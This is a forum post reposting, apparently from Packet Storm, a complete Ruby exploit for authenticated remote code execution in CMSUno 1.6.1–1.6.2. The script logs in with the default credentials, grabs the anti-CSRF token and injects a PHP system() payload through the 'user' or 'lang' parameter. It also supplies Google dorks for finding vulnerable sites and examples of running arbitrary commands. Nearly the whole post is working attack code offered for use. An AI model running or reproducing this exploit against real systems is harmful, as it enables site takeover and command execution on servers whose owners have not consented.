CMSUno 1.6.2 Remote Code Execution

#192
Topic created · 1 Posts · 1 Views
  • CMSUno version 1.6.2 authenticated remote code execution exploit. The original discovery for the vulnerability leveraged is attributed to Fatih Celik in November of 2020.
    MD5 | c9bd2539c27d5fd817353fb1531448fc
    Download

    #!/usr/bin/env ruby  
    # Exploit  
    ## Title: CMSUno 1.6.1 <= 1.6.2 - Remote Code Execution (Authenticated)  
    ## Google Dorks:  
    ##   inurl:uno/central.php  
    ##   inurl:uno/config.php  
    ##   inurl:uno.php intitle:"CMSUno - Login"  
    ## Author: noraj (Alexandre ZANNI) for SEC-IT (https://secit.fr)  
    ## Author website: https://pwn.by/noraj/  
    ## Date: 2021-01-15  
    ## Vendor Homepage: https://www.boiteasite.fr/cmsuno.html  
    ## Software Link: https://github.com/boiteasite/cmsuno/archive/1.6.2.tar.gz  
    ## Version: 1.6.1, 1.6.2  
    ## Tested on: Bludit  
    ## - 1.6.3 ❌  
    ## - 1.6.2 ✅  
    ## - 1.6.1 ✅  
    ## - 1.6.0 ❌  
    ## - 1.5.7 ❌  
    ## Patch: Update to 1.6.3  
    # Vulnerabilities  
    ## Discoverer: Fatih Çelik  
    ## Date: 2020/09/30  
    ## Discoverer website: https://fatihhcelik.blogspot.com  
    ## Discovered on CMSUno 1.6.2 and tested on Kali Linux 2020.2  
    ## Vulnerability 1:  
    ##   Title: CMSUno 1.6.2 - 'user' Remote Code Execution (Authenticated)  
    ##   CVE: CVE-2020-25557  
    ##   References: https://fatihhcelik.blogspot.com/2020/09/cmsuno-162-remote-code-execution.html  
    ## Vulnerability 2:  
    ##   Title: CMSUno 1.6.2 - 'lang' Remote Code Execution (Authenticated)  
    ##   CVE: CVE-2020-25538  
    ##   References: https://fatihhcelik.blogspot.com/2020/09/cmsuno-162-remote-code-execution_30.html  
    require 'httpclient'  
    require 'docopt'  
    # username = 'cmsuno'  
    # password = '654321'  
    # root_url = 'http://localhost:5000/'  
    # command = 'pwd'  
    doc = <<~DOCOPT  
    CMSUno 1.6.1 <= 1.6.2 - Remote Code Execution (Authenticated)  
    Usage:  
    #{__FILE__} -r <url> -c <cmd> [-u <username>] [-p <password>] [-t <tech>] [--debug]  
    #{__FILE__} -H | --help  
    Options:  
    -r <url>, --root-url <url>            Root URL (base path) including HTTP scheme, port and root folder  
    -u <username>, --user <username>      user name (if not default: cmsuno)  
    -p <password>, --pass <password>      User password (if not default: 654321)  
    -c <cmd>, --command <cmd>             Command to execute on the target  
    -t <tehc>, --technique <tech>         Technique: exploiting 'user' param (default, with output) or 'lang' param (blind)  
    --debug                               Display arguments  
    -h, --help                            Show this screen  
    Examples:  
    #{__FILE__} -r http://example.org -c id  
    #{__FILE__} -r https://example.org:5000/cmsuno -c 'touch hackproof' -u john -p admin1234 -t lang  
    DOCOPT  
    # Get anti-CSRF token  
    def get_unox(client, auth_status)  
    print '[*] Fetching anti-CSRF token: '  
    res = client.get(LOGIN_URL)  
    case auth_status  
    when false  
    regexp = /name="unox" value="([a-f0-9]{32}?)"/  
    when true  
    regexp = /Unox='([a-f0-9]{32}?)'/  
    end  
    token = regexp.match(res.body).captures[0].chomp  
    puts token  
    return token  
    end  
    def login(client, user, pass)  
    data = {  
    'unox' => get_unox(client, false),  
    'user' => user,  
    'pass' => pass,  
    }  
    puts '[*] Logging in'  
    res = client.post(LOGIN_URL, data)  
    return res.body  
    end  
    def exploit(client, user, pass, cmd, tech)  
    payload = "#{user}\";$pass='#{pass}';system('#{cmd}');?>// "  
    case tech  
    when 'user'  
    data = "action=sauvePass&unox=#{get_unox(client, true)}&user0=#{user}&pass0=#{pass}&user=#{payload}&pass=#{pass}&lang=en"  
    when 'lang'  
    data = "action=sauvePass&unox=#{get_unox(client, true)}&user0=&pass0=&user=&pass=&lang=#{payload}"  
    else  
    raise 'Wrong exploitation technique argument value'  
    end  
    headers = {  
    'X-Requested-With' => 'XMLHttpRequest'  
    }  
    #client.proxy = 'http://localhost:8080'  
    puts "[*] Starting exploitation, using '#{tech}' param technique"  
    client.post(VULNERABLE_URL, data, headers)  
    # Login again to trigger uno/password.php  
    clnt2 = HTTPClient.new  
    return login(clnt2, user, pass).lines[..-2].join  
    end  
    begin  
    args = Docopt.docopt(doc)  
    pp args if args['--debug']  
    username = args['--user'] || 'cmsuno'  
    password = args['--pass'] || '654321'  
    technique = args['--technique'] || 'user'  
    LOGIN_URL = "#{args['--root-url']}/uno.php"  
    VULNERABLE_URL = "#{args['--root-url']}/uno/central.php"  
    clnt = HTTPClient.new  
    login(clnt, username, password)  
    output = exploit(clnt, username, password, args['--command'], technique)  
    print '[*] Command output:'  
    case technique  
    when 'user'  
    puts "\n#{output}"  
    when 'lang'  
    puts ' blind RCE, no output with this exploitation technique'  
    end  
    rescue Docopt::Exit => e  
    puts e.message  
    end
    

    Source: packetstormsecurity.com

Log in to reply